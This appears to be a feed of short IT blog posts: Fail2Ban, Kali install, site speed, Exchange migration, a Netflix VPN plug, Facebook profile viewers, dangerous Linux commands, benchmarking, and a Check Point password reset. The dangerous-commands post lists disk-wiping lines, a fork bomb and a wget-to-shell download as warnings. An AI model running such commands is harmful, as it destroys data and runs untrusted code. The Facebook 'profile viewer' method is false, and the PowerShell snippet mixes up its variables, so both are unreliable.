By opening ports from the Internet to your raspberry pi (ssh, http, ftp, https etc.), you are automatically becoming a victim of many hacker’s attempts. Hackers are seeking exploits and trying to get access to your server. To protect you against such attacks, there is a tool called Fail2Ban. It supports a lot of services (sshd, apache, qmail, proftpd etc.) and can be integrated directly with your IPTables. By this tutorial, we will guide you via the whole process of how to protect against such attacks.   

Who is trying to access my raspberry pi?

If you think that your raspberry pi is safe and you do not need any tool to be installed, please check the content of the following file:

cat /var/log/auth.log | grep 'Failed'

As you can observe above, there are many password failures. Usually, the hacker bots are seeking exploits.  Each attempt consumes resources as your raspberry pi needs to evaluate each request. It is known as DoS attack. 

Hackers can try also a brute-force attack.  Such an attack consists of an attacker submitting many passwords or passphrases with the hope of eventually guessing a combination correctly. The attacker systematically checks all possible passwords and passphrases until the correct one is found. 

What is Fail2Ban and how does it work?

Fail2Ban is a daemon that scans access log files and it bans IP addresses that show malicious signs. It protects you against too many password failures as shown above. 

It is a must have tool to protect your from intruders to your server or network especially if you allow outside SSH traffic or any traffics from an outside network to your Raspberry Pi. Fail2Ban tool supports many different services (sshd, apache, qmail, proftpd, sasl, asterisk, etc) and can be integrated with your IPTables.

Installation of Fail2Ban is very easy to install and basic setup will drastically improve security on your Raspberry Pi. Fail2Ban works by checking your access logs for failures and depending on the settings you setup, it will ban or timeout an IP Address for a certain amount of time. Fail2Ban tool can easily protect your raspberry pi against very known brute-force and DoS attacks.

How can I protect myself?

Very easy, by installing of Fail2Ban on your raspberry pi. We will first install Fail2Ban by typing the following commands:

sudo apt-get update
sudo apt-get install fail2ban

By doing that, you have Fail2Ban already installed. The configuration file is located at ‘/etc/fail2ban/jail.local’. If you want to change some parameters, you can simply modify this file and restart the service to take immediate effect.

Let’s edit our SSH Fail2Ban configurations. Open up the ‘/etc/fail2ban/jail.local’ file with the following command:

sudo nano /etc/fail2ban/jail.local

Your jail.local file should already contain some pre-defined config. We will need to tweak it a little bit. Find a section in the file called [sshd] and paste/modify accordingly:

[sshd]

enabled = true
filter = sshd
port = ssh
logpath = /var/log/auth.log
bantime = 86400
banaction = iptables-allports
findtime = 900
maxretry = 3
backend = %(sshd_backend)s

sudo service fail2ban restart

sudo fail2ban-client set sshd unbanip <IP-YOU-WANT-TO-UNBAN>

sudo iptables -L -n --line

The post How to install Fail2Ban on the Raspberry Pi/Unix server appeared first on ITBlogSec.com.

Enjoy and stay tuned for the next episodes  

What you can learn 

If you want to start with hacking, first you need to have some hacking tools available. The best option for that purpose is using Kali Linux what is linux distribution specially designed to be used for hacking activities. As the part of our hacking tutorials for beginners, we are starting with the #1 where you can find exact steps how to install Kali linux on MacOS using Parallels Desktop or Virtual Box. Of course, you can use any virtualization platform you want, even there is ARM Kali Linux image available for rapsbperry PI, you can download it here. 

1: Download kali linux image

– use official webpage https://www.kali.org/downloads/

2: Import Kali linux image

– here is example by using Parallels Desktop – choose Debian GNI/Linux (the same applicable for for Virtual Box)

3: Choose name and location 

4: Select type of installation (Graphical install)

5: Select language for installation

6: Wait for installation 

7: Type hostname of your Kali linux system

8: Type domain name

– if you do not use domain, just leave it blank

9: Set-up user and password

– (always use strong password)

10: Select your time-zone 

11: Partition and format your virtual disk

– please select: Guided – use entire disk

12: Select software you want to install

– of course later you can install any kind of software you want

13: Install GRUB boot loader

14: Wait for installation to be finished

15: Congratulations! We are done.

– Now your Kali linux system is ready to be used for your hacking practice 

Conclusion

At this point, you have the system which is ready to learn new hacking practice by yourself. In our next tutorials, we will try to bring you step-by-step guides how to learn ethical hacking practices. Stay tuned, like us on facebook and soon there will second part of Hacking for Beginners available. 

The post Hacking for beginners #1 – Install the Kali Linux appeared first on ITBlogSec.com.

The common mindset when it comes to considering a website’s success is that owners need only worry about the type of content they want to publish. However, times have changed drastically, and so have consumers. There are now several factors that determine the success of a website. One of those is website speed.

Website speed is essentially the time in which an entire page loads after being clicked. At this age, when internet speeds are reaching new heights, consumers won’t accept websites that take more than a few seconds to load. For image or media-heavy websites, increasing movement speed is a hard task. However, with a few simple tips, load times can be reduced dramatically.

Please check also a very interesting article Web server performance benchmark for free.

Avoid Auto-Play Videos

Auto-play videos are despised by people for two reasons. The first is that it’s annoying to have a video pop up when you open a page. Another reason is that these videos hinder page loading time, as it takes a lot of resources and bandwidth to start the video. While Google and Apple cracked down on such videos last year, they are still present on some websites.

It’s best to avoid adding auto-play videos to satisfy the visitors of a website and to keep the website’s performance in top condition all at once. It’s best to give the visitors the option of watching a video instead of forcing them to watch it immediately.

Use Appropriately Sized Images

What most new website owners don’t know is that each website has its own proper dimensions for an image. For instance, there are some websites that use 900x1800px images whereas their website can only handle 300×600 images. This forces the website to load more than it can handle, thus greatly affecting the speed.

The right way to change the dimensions of an image is through the server-side of the website. Once done, those changes will be applied directly on the front-end. Understandably, some images may suffer from the smaller dimensions but visitors will prefer a lighting speed website over one with large images.

Use the Right Image Format

The most common image formats online are JPG and PNG. However, most web developers now prefer the new WebP format as it takes the best out of both JPG and PNG.

In terms of compatibility, WebP is available for Chrome and Opera users, but it isn’t technically a universal format yet. Compared to PNG, WebP offers 26% smaller file sizes without sacrificing quality. Compared to JPG, it offers 25-35% smaller file sizes on the same image quality. That means WebP images will load faster than both of these formats every time.

Optimize for Mobile

A lot of web developers also forget to optimize their website for mobile platforms. Whenever a user visits a website that’s not optimized for mobile devices, that page will begin loading a desktop version which will take more time to load.

Most web development platforms now have a feature that automatically optimizes a website for mobile use. These are great, as it takes a considerable amount of time to create a mobile version of a website. When mobile optimization happens, images are reduced drastically to accommodate the smaller screens of smartphones.

Pick the Right Media

In most cases, web developers have to make sacrifices regarding content. One of the sure ways to reduce loading speed is to simply reduce the amount of content that needs to load in a website. Website owners should carefully sift through their images and videos to see which ones aren’t exactly needed and could be removed to make way for loading speed.

It’s also important to browse through the website to see if there are any images or videos that load several times on one page. Each piece of unnecessary media removed results in better loading times even if it’s just a fraction of a second.

These tips combined will radically improve the loading speed of a website.

But why is it important?

According to recent statistics, people leave websites that take over three seconds to load. This basically means that a website loses profit if it continues to perform slowly. This is just one figure that dictates the importance of website speed. These statistics show the eye-opening figures regarding how speed affects a website’s overall performance.

Please check also interesting article: 10 of the best plugins to keep your Wordpress site safe.

source: https://hostingtribunal.com/

The post Improving the Website Speed of a Media-Heavy Website appeared first on ITBlogSec.com.

When you are working in a hybrid environment where both on-premises Exchange Server and Office 365 are available, then it becomes beneficial for the Exchange Administrator to migrate some user mailboxes to Office 365 from Exchange Server because it provides much flexibility to access mailboxes from anywhere.

Now there are two methods which you can employ for the migration. First one is using the Exchange Admin Center where you create the migration endpoint and perform the batch migration. The second method is using the Exchange PowerShell command (using the MoveRequest) to migrate the batches mailboxes.

To get the complete information regarding the migration, we will go through the migration process using Exchange Management Shell commands.

Complete process:

1. First, start the Exchange Management Shell.
2. Run the command:
   Set-ExecutionPolicy Unrestricted

The command will allow you to run each kind of script even if it is digitally signed or not. It will ask you to make a choice, click Y.

3. Now, run the next command:
   $livecred = Get-Credential

The command opens a login console where you need to input the Exchange Online credentials of the Administrator account to the $livecred variable.

4. Run the next command:
   $s = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://outlook.office365.com/powershell-liveid/ -Credential $cred -Authentication Basic -AllowRedirection

The command first asks you to input the Administrator credentials, and then input the credential to create a new session.

5. Run the next command:
   $importresults= Import-PSSession $s

The command will import the session to the respective variable. The process will take some seconds to complete. Just wait for a little and let it complete.

6. When you have created a session with the Exchange Online, you can start the move request:
   New-MoveRequest -Identity “Tony” -Remote -RemoteHostName “localmailserver.mydomain.com” -TargetDeliveryDomain mydomain.mail.onmicrosoft.com -RemoteCredential $importresults

7. Monitor the move request using the following command:
   Get-MoveRequest | Get-MoveRequestStatistics  

The command will bring the details of the ongoing move request.

8. After completing the migration from Exchange to Office 365, you can remove the move request:
   Get-MoveRequest | Remove-MoveRequest  

Important parameters:

The MoveRequest command uses multiple parameters which are useful for different move request between a variety of source and destinations. Some of them are present below:

AllowLargeItems
It will allow you to mention the larger mailbox items than the target mailbox limit. You do not need to input value while using the parameter, and the data will be copied with any loss. The parameter is available only in on-premises Exchange Server.

ArchiveOnly
This parameter specifies that the user is moving only the archive folder associated with the mailbox.

BadItemLimit
It is an important parameter when the size of the mailbox or database is quite large; then there are chances that some items not suitable for migration. It specifies the total number of bad items before the move request fails. Missing or deleted items from the source mailbox are also counted as bad items and considered as not suitable for the migration.

CompletedRequestAgeLimit
The parameter notifies the total number of days after which the move request will get deleted automatically. The default limit is 30 days, and you can change it depending on your requirement.

Identity
Identity parameter specifies the name of the mailbox or user. Here, you can use Alias, SMTP address, Distinguished Name, User Principal Name (UPN).

PrimaryOnly
The PrimaryOnly parameter denotes that the move request migrates only the primary mailbox excluding the personal archive. Use this parameter only when there is a personal archive that need not be migrated.

Conclusion

Microsoft provides all the necessary methods to perform a secure Office 365 migration. But the complexity of these methods makes the job of Office 365 Administrator quite tough. But Kernel Migrator for Office 365 saves you from all these difficulties. As its name mentions, Kernel Migrator for Office 365 is migration software for the Office 365 mailboxes, and public folders. It supports every plan of Office 365. You can perform a migration from Exchange to Office 365 or vice e versa. It provides suitable filters and scheduling options to run the migration under your control and provides a clean migration report after the migration.

The post Office 365 Migration Using New – MoveRequest cmdlets appeared first on ITBlogSec.com.

Netflix is one of the best resources for entertaining content today, as it offers a subscription to one of the largest libraries of movies and series. Everybody wants to watch Netflix, everybody wants to get the newest and the best content and enjoy their winter evenings with the favorite series characters. However, not everything is so simple. 

Netflix offers their services in a range of countries, and citizens of both Europe, America, and other places enjoy this resource. But the company has contracts with the relevant authorities in each country, and promotes only certain content to users. In other words, in addition to some universal content available via Netflix, the users are offered specific movies and series created by the country they are located in. It means that users from other states cannot watch a local series sometimes, or local users cannot watch a series of a different state. For these cases, VPN for Netflix is a solution.

Netflix is a cool resource, but the limitation it puts on content by the geographical principle makes many users mad. To manage this problem, you can find more info on what software is the best to unlock Netflix for you. Since the world becomes more globalized, it is weird that an entertainment resource limits access from different countries to local content. Therefore, to enjoy Netflix to its fullest, download and use VPN solution. 

When you travel abroad and one evening decide to have a good time with a glass of wine and new episode of your favorite series that you have waited for a whole week, even a more stupid situation can occur. Since you are not in your home country, your Netflix subscription may not work the way to expected, and you cannot reach the local content of your home country from a different country! So, your evening is spoiled and you end up watching something random on YouTube. To avoid such fails, check Bestvpnrating.com for software that suits you, and enjoy your Netflix wherever you travel. 

source: https://latesthackingnews.com

The post Watch Netflix content from wherever appeared first on ITBlogSec.com.

Have you ever wondered who viewed your Facebook profile? I know you have done it many a time. Unfortunately, there are no formal ways to get the information of your profile visitors on Facebook. But don’t worry! We got a few unofficial ways to figure out who visited your Facebook profile. You don’t have to rack your brain for doing that. 

Can you really see who views your Facebook profile?

Yes, you probably can! Though there are no official ways, you can do it making use of a “who viewed my Facebook profile Chrome extension” or by installing another mobile/desktop application. Plenty of “who viewed my Facebook profile extensions” are available in the Chrome Store, also you can find many mobile/desktop applications available for downloading. But, please be careful as most applications is desired for the sole purpose – just to steal your personal details. Please do not enter any login credentials to any 3rd party extensions/applications once you are asked to do so.

The safest way how to see who viewed your Facebook profile is doing it by manual searching in page source. Then you can exclude any personal details theft and you can be sure that your personal data are safe. Check method below how to do so.

Using the Browser Only

You only need a browser in order to check who looks at your Facebook profile using this method. The steps are given below:

Step 1: Visit facebook.com and log in. You will see your news feed. But you have to be at your timeline here. So click the first name of yours given on the blue navigation bar on top of the web page.

Step 2: Right click anywhere on an empty area. And look for the “view page source”, click on it. A new tab will open with lots and lots of  code. Don’t hesitate its very  simple just follow the next step.

Step 3: Now, you can see a long page with incomprehensible codes. Press Ctrl+ F at this step to get the search box. Type in “InitialChatFriendsList” without quotes and press Enter.

Step 4: It will take you somewhere where ID’s are present. These  ID’s are none other than the ID’s or the users who has seen your Facebook profile.

Step 5: Next, copy the single ID leaving the part after “-“ as shown in above picture in blue color and paste it after the link “www.facebook.com/ID”.  For example: “www.facebook.com/1001675438”” and then press Enter. This will open a profile of a user, means this user has seen your profile.

Step 6: As you can see in the image, you will see a bunch of numbers after this text. Those are the profile IDs of people who recently visited your Facebook profile. To see whose IDs are those, you need to add the same after ‘facebook.com/’ and enter into the address bar of your browser.

NOTE: An ID which is coming in the first place has seen your Facebook profile recently than the ID appearing at 2nd  position and the ID at third position has seen before 4th one means the recent views of your Facebook profile comes first. But this trick doesn’t reveal that at what particular time or day the user has seen your Facebook profile.

Conclusion

So with this trick you can check who keeps coming regularly on your Facebook profile. This trick only works on Google Chrome browser. Hoping that after following this article you get to know how to see who views your Facebook profile. However, you can share your thoughts and queries if you find any problem while following the above procedure. We are not sure about the legibility of this method and we cannot ensure 100% validity of output. Proceed at your own risk.

ALSO READ: Send Anonymous emails: 19 sites to keep your identity hidden 

source: http://www.dreamytricks.net

The post How to see who viewed your Facebook profile appeared first on ITBlogSec.com.

There are many commands that can irreversibly damage your system. Some are less cryptic than others, some look like plain gibberish. Here is a list of dangerous commands on Linux, some permanent and some that can be recovered from.

Irreversible Linux Commands – The Most Dangerous Ones

rm -Rf /

This command has gained a lot of notoriety, and is particularly dangerous. Thankfully, many UNIX systems have placed a safeguard into the rm command to ensure that it doesn’t happen accidentally or unintentionally. It might be confusing to think that something so destructive could be run accidentally, but it’s really as simple as using an uninitialized variable in a BASH script and not checking it before running the command.

shred /dev/sda

Shred is a particularly dangerous command, unlike in the case of rm where anyone with some data recovery knowledge can data-carve the volume for any important files, shred does just as the name suggests. Shred feeds off of the operating systems /dev/random or /dev/urandom to generate random information. This information is then used to overwrite the drive in several passes rendering the data irretrievable. Even if you manage to interrupt the process before it gets through too much of your data, you’ll still have to rebuild your partition table and repair any filesystems that may have been touched. Shred is certainly a dangerous command if not used carefully.

dd if=/dev/random of=/dev/sda

dd is an amazingly useful tool. It can be used for making clones of volumes, filesystems, writing images to disks, and even erasing drives.The above dd command accomplishes something that is about the same as shred, with the only differences being that shred is much faster and does multiple passes by default.

mkfs.ext4 /dev/sda1

As Picasso said, “every act of creation is first an act of destruction,” and the same is true with mkfs. The fault here doesn’t lie with ext4 particularly, only that in order to create a new filesystem you must discard all existing data on the volume. This obviously isn’t a trouble on a shiny new disk, but it can bring a running system to its knees if it’s used without discretion.

mv / /dev/null

This one is on par with our first. Anything written to /dev/null will write successfully. This means that this command is effectively the same as our first, although it might take longer to accomplish.

Dangerous, Although Reversible Linux Commands

:(){:|:&};:

wget http://unknownsource.com/possiblydangerous.sh -O- | sh

gunzip untrusted.gz

command > file.conf

^mistake^correction

Surely, there are many more commands that can disrupt or permanently impair a system. Did we miss any big ones? Do you know of any obscure ones? Let us know in the comments below.

source: https://fossbytes.com

The post 10 most dangerous linux commands you should never run appeared first on ITBlogSec.com.

Sometimes you need to find out what is average response time of your website. Such information is very useful and can lead you to optimize and tune your web-server for better performance. In the article we will introduce you possibilities how to make benchmark of your web-server for free.

1. ApacheBench

AB is a tool for benchmarking your Apache Hypertext Transfer Protocol (HTTP) server. It is designed to give you an impression of how your current Apache installation performs. This especially shows you how many requests per second your Apache installation is capable of serving.

sudo apt-get update

Refresh the package database.

 sudo apt-get install apache2-utils

Install the apache2-utils package to get access to ApacheBench.

Now you are ready to run benchmark. To isolate any network latency, it is the best idea to run it locally on web-server you want to test. Let’s see how it performs for 5000 requests with a concurrency of 500.

ab -n 5000 -c 500 http://localhost:80/

AB benchmark tool

As you can see above, web-server was able to handle 5000 request in 25.905 seconds and 193.01 requests per 1 second.

2. Siege

Siege is an HTTP load testing and benchmarking utility. It has a similar interface to ab, which will make transitioning to the tool almost seamless. Also, instead of testing against a single URL, Siege allows you to test against multiple. This allows for a more real-world simulation of how a user would use your system.

Refresh the package database.

sudo apt-get update

So, lets install Siege.

sudo apt-get install siege

That was easy, apt-get will resolve dependencies for you so if everything’s gone well you should be able to get stuck right in, lets say we’ve got a WordPress instance under localhost that we want to test, simply run this command:

siege -c 5 -b -t30s 'http://localhost'

Here’s a quick explanation of the options we’ve used above:

• -c 5 – run with five concurrent requests
• -b – benchmark mode
• -t30s – time, run for 30 seconds
• http://localhost – the target of the benchmark

Siege benchmark tool

In the result, server has 100% availability and was able to serve 247.01 transaction/sec.

3. jMeter

jMeter is an Open Source testing software. It is 100% pure Java application for load and performance testing. jMeter is designed to cover categories of tests like load, functional, performance, regression, etc., and it requires JDK 5 or higher.

Stefano Mazzocchi of the Apache Software Foundation was the original developer of JMeter. He wrote it primarily to test the performance of Apache JServ (now called as Apache Tomcat project). Apache later redesigned JMeter to enhance the GUI and to add functional testing capabilities.

JMeter is a Java desktop application with a graphical interface that uses the Swing graphical API. It can therefore run on any environment / workstation that accepts a Java virtual machine, for example − Windows, Linux, Mac, etc.

Example of jMeter GUI

As it is quite complex tool, with many functions, you can find detailed tutorial how to use it here.
You can download jMeter official tool here.

4. Pingdom Website Speed Test

One of the online tools which can be used for online benchmark and provide useful information. You can specify website you want to test and as results you can obtain load time, response code, content size, file requests etc. Feel free to use it here.

Pingdom online benchmark tool

Conclusion

Beware there are many free tools related with website (web-server) benchmark. Just use google and you can find many variations. As web administrator you should always pay attention to performance of your website. The best approach is to make benchmark periodically and try to optimize web-server for the best results. Good luck!

The post Web server performance benchmark for FREE appeared first on ITBlogSec.com.

You’ve just issued time-consuming command in UNIX/LINUX. Suddenly you need to leave or turn off computer but command must be continued and finished in background. Once you have entered command and you don’t want to interrupt it, please follow instructions below to make it continue running in background

First Method

1. Open new terminal window (or duplicate one currently running)

2. Find out current PID of process which is currently running (in our case it is “ping 8.8.8.8”)

ps aux | grep ping

3. Suspend command identified by PID and run it in background

sudo kill -20 12402 sudo kill -18 12402

4. In case you want to finish command manually anytime

sudo kill 12402

Second Method

1. Run some command (in our case ping 8.8.8.8)

2. Press Ctrl + Z to stop (pause) the program and get back to the shell

3. Run command in the background

4. Now you can close terminal window (putty) and  your process will be running in the background

5. Open new terminal window and check that process is still running

ps aux | grep ping

The post How to put currently running process to background appeared first on ITBlogSec.com.

Check Point Gaia is the next generation Secure Operating System for all Check Point Appliances, Open Servers and Virtualized Gateways. Gaia combines the best features from IPSO and SecurePlatform (SPLAT) into a single unified OS providing greater efficiency and robust performance. By upgrading to Gaia, customers will benefit from improved appliance connection capacity and reduced operating costs. With Gaia, IP Appliance customers will gain the ability to leverage the full breadth and power of all Check Point Software Blades.

Sometimes you need to reset your admin or expert password in GAIA and you do not have physical access to the machine. Follow procedure below  to reset passwords remotely from management (of course there must be SIC established before your GW and management you will issue commands from):

1. Switch to the context of the involved Domain that manages your Security Gateway:

[Expert@HostName]# mdsenv <Domain_Name>

2. Generate hash for new password – run the following command and save the generated hash string:

[Expert@HostName]# /sbin/grub-md5-crypt  

3. Ensure that the Clish database is unlocked on the remote Security Gateway:

[Expert@HostName]# $CPDIR/bin/cprid_util -server <IP_of_Gateway> -verbose rexec -rcmd /bin/clish -s -c 'set config-lock on override'  

4. Change the admin user password:

[Expert@HostName]# $CPDIR/bin/cprid_util -server <IP_of_Gateway> -verbose rexec -rcmd /bin/clish -s -c 'set user admin password-hash <Password_Hash_from_Step_2>'

5. You can also change the Expert password:

[Expert@HostName]# $CPDIR/bin/cprid_util -server <IP_of_Gateway> -verbose rexec -rcmd /bin/clish -s -c 'set expert-password-hash <Password_Hash_from_Step_2>'

The post Checkpoint FW GAIA – remote admin/expert password reset appeared first on ITBlogSec.com.